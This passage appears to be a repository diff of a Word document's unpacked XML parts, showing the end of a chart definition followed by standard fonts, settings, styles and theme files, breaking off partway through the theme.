<c:crossAx val="59304576"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="midCat"/>
</c:valAx>
<c:serAx>
<c:axId val="59572224"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
<c:txPr>
<a:bodyPr/>
<a:lstStyle/>
<a:p>
<a:pPr rtl="0">
<a:defRPr/>
</a:pPr>
<a:endParaRPr lang="en-US"/>
</a:p>
</c:txPr>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

View File

@ -0,0 +1,31 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:font w:name="Calibri">
<w:panose1 w:val="020F0502020204030204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
<w:font w:name="Times New Roman">
<w:panose1 w:val="02020603050405020304"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Tahoma">
<w:panose1 w:val="020B0604030504040204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Cambria">
<w:panose1 w:val="02040503050406030204"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
</w:fonts>

Binary file not shown.

View File

@ -0,0 +1,36 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
<w:zoom w:percent="100"/>
<w:proofState w:spelling="clean" w:grammar="clean"/>
<w:defaultTabStop w:val="708"/>
<w:characterSpacingControl w:val="doNotCompress"/>
<w:compat/>
<w:rsids>
<w:rsidRoot w:val="00D15BD0"/>
<w:rsid w:val="00D15BD0"/>
<w:rsid w:val="00F8254F"/>
</w:rsids>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr>
<w:themeFontLang w:val="en-US"/>
<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
<w:shapeDefaults>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout>
</w:shapeDefaults>
<w:decimalSymbol w:val=","/>
<w:listSeparator w:val=";"/>
</w:settings>

View File

@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:docDefaults>
<w:rPrDefault>
<w:rPr>
<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
<w:sz w:val="22"/>
<w:szCs w:val="22"/>
<w:lang w:val="en-US" w:bidi="ar-SA"/>
</w:rPr>
</w:rPrDefault>
<w:pPrDefault>
<w:pPr>
<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
</w:pPr>
</w:pPrDefault>
</w:docDefaults>
<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="toc 1" w:uiPriority="39"/>
<w:lsdException w:name="toc 2" w:uiPriority="39"/>
<w:lsdException w:name="toc 3" w:uiPriority="39"/>
<w:lsdException w:name="toc 4" w:uiPriority="39"/>
<w:lsdException w:name="toc 5" w:uiPriority="39"/>
<w:lsdException w:name="toc 6" w:uiPriority="39"/>
<w:lsdException w:name="toc 7" w:uiPriority="39"/>
<w:lsdException w:name="toc 8" w:uiPriority="39"/>
<w:lsdException w:name="toc 9" w:uiPriority="39"/>
<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
</w:latentStyles>
<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
<w:name w:val="Normal"/>
<w:qFormat/>
<w:rsid w:val="00063BF6"/>
</w:style>
<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
<w:name w:val="Default Paragraph Font"/>
<w:uiPriority w:val="1"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="table" w:default="1" w:styleId="TableNormal">
<w:name w:val="Normal Table"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:qFormat/>
<w:tblPr>
<w:tblInd w:w="0" w:type="dxa"/>
<w:tblCellMar>
<w:top w:w="0" w:type="dxa"/>
<w:left w:w="108" w:type="dxa"/>
<w:bottom w:w="0" w:type="dxa"/>
<w:right w:w="108" w:type="dxa"/>
</w:tblCellMar>
</w:tblPr>
</w:style>
<w:style w:type="numbering" w:default="1" w:styleId="NoList">
<w:name w:val="No List"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="paragraph" w:styleId="BalloonText">
<w:name w:val="Balloon Text"/>
<w:basedOn w:val="Normal"/>
<w:link w:val="BalloonTextChar"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:rsid w:val="00CD271A"/>
<w:pPr>
<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
</w:pPr>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
<w:name w:val="Balloon Text Char"/>
<w:basedOn w:val="DefaultParagraphFont"/>
<w:link w:val="BalloonText"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:rsid w:val="00CD271A"/>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
</w:styles>

View File

@ -0,0 +1,283 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
<a:themeElements>
<a:clrScheme name="Office">
<a:dk1>
<a:sysClr val="windowText" lastClr="000000"/>
</a:dk1>
<a:lt1>
<a:sysClr val="window" lastClr="FFFFFF"/>
</a:lt1>
<a:dk2>
<a:srgbClr val="1F497D"/>
</a:dk2>
<a:lt2>
<a:srgbClr val="EEECE1"/>
</a:lt2>
<a:accent1>
<a:srgbClr val="4F81BD"/>
</a:accent1>
<a:accent2>
<a:srgbClr val="C0504D"/>
</a:accent2>
<a:accent3>
<a:srgbClr val="9BBB59"/>
</a:accent3>
<a:accent4>
<a:srgbClr val="8064A2"/>
</a:accent4>
<a:accent5>
<a:srgbClr val="4BACC6"/>
</a:accent5>
<a:accent6>
<a:srgbClr val="F79646"/>
</a:accent6>
<a:hlink>
<a:srgbClr val="0000FF"/>
</a:hlink>
<a:folHlink>
<a:srgbClr val="800080"/>
</a:folHlink>
</a:clrScheme>
<a:fontScheme name="Office">
<a:majorFont>
<a:latin typeface="Cambria"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" ゴシック"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Times New Roman"/>
<a:font script="Hebr" typeface="Times New Roman"/>
<a:font script="Thai" typeface="Angsana New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="MoolBoran"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Times New Roman"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:majorFont>
<a:minorFont>
<a:latin typeface="Calibri"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" 明朝"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Arial"/>
<a:font script="Hebr" typeface="Arial"/>
<a:font script="Thai" typeface="Cordia New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="DaunPenh"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Arial"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:minorFont>
</a:fontScheme>
<a:fmtScheme name="Office">
<a:fillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="50000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="35000">
<a:schemeClr val="phClr">
<a:tint val="37000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:tint val="15000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="1"/>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:shade val="51000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="80000">
<a:schemeClr val="phClr">
<a:shade val="93000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="94000"/>
<a:satMod val="135000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="0"/>
</a:gradFill>
</a:fillStyleLst>
<a:lnStyleLst>
<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr">
<a:shade val="95000"/>
<a:satMod val="105000"/>
</a:schemeClr>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
</a:lnStyleLst>
<a:effectStyleLst>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="38000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
<a:scene3d>
<a:camera prst="orthographicFront">
<a:rot lat="0" lon="0" rev="0"/>
</a:camera>
<a:lightRig rig="threePt" dir="t">
<a:rot lat="0" lon="0" rev="1200000"/>
</a:lightRig>
</a:scene3d>
<a:sp3d>
<a:bevelT w="63500" h="25400"/>
</a:sp3d>
</a:effectStyle>
</a:effectStyleLst>
<a:bgFillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
